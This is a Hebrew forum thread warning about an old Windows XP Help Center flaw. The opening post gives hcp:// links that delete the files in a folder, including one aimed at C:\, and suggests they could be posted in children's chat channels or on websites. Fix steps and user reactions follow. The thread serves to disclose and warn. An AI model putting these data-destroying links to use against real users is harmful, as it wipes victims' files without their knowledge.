bug in win XP u should read it!

[Palamnaeusus]

באג האבטחה החמור בחלונות אקס.פי :

בחלונות אקס.פי התגלה באג חמור ביותר, במיקרוסופט הוסיפו את תיקונו

לחבילת העדכון שלהם בשקט יחסי, ללא כל הודעה לציבור

:ולהלן פרטי הבאג

hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*

כל הרושם שורה זאת בדפדפן האינטרנט של מיקרוסופט, אקספלורר

ימחק לעצמו את כל הקבצים אשר נמצאים בספריה

C:\Test\

אך הספריות המשניות אינן יפגעו

אם מישהו ירגיש מאוד זדוני הוא יכול למשל

לכתוב את השורה הבאה בערוץ כלשהו ברשתות הצ'אטים למינהן*

:אשר הראה ילדים תמימים נמצאים בהם

"hcp://system/DFS/uplddrvinfo.htm?file://c:\\*"

או שאנשים יכולים בקלות להכניס את אחת מהשורות הבאות לאתריהן*

.ולגרום לאותו נזק במחשבכם

:תיקון הבאג

דווקא תיקונו של הבאג אינו דורש מאמץ מי יודע מה

:מיחקו או שנו את השם הקובץ .1

C:\WINDOWS\PCHEALTH\HELPCTR\System\DFS\uplddrvinfo.htm

uplddrvinfo.htm מיצאו את הקוד הבא בקובץ .2

var oFSO = new ActiveXObject ( "Scripting.FileSystemObject" );

try

{

oFSO.DeleteFile( sFile );

}

[http://www.ivgi.net/]

[MiniMizer]

אכן, הבאג הזה קיים וזו בושה שלא פרסמו עליו שום מידע עד לאחרונה.

http://www.theregister.co.uk/content/4/27074.html

[CoronaLover]

OUCH!

חוץ מבאג היוניקוד בIIS זה נידמה לי הכי חמור שמיקרוסופט הצליחו להמציא איי פעם....

מחשב קפוט בלחיצה על לינק....DAMN

[KoDkOd]

לא הבנתי את הקטע... "הזה אם מישהו ירגיש מאוד זדוני הוא יכול למשל

לכתוב את השורה הבאה בערוץ כלשהו ברשתות הצ'אטים למינהן*

:אשר הראה ילדים תמימים נמצאים בהם

"hcp://system/DFS/uplddrvinfo.htm?file://c:\\*"

או שאנשים יכולים בקלות להכניס את אחת מהשורות הבאות לאתריהן*

.ולגרום לאותו נזק במחשבכם"

[Palamnaeusus]

וזה למה אנחנו מפרסמים את זה...

שילד קטן לא יהרוס את המחשב בטעות.. או כל אחד שלא מכיר את הבאג הזה..

צריך להיזהר..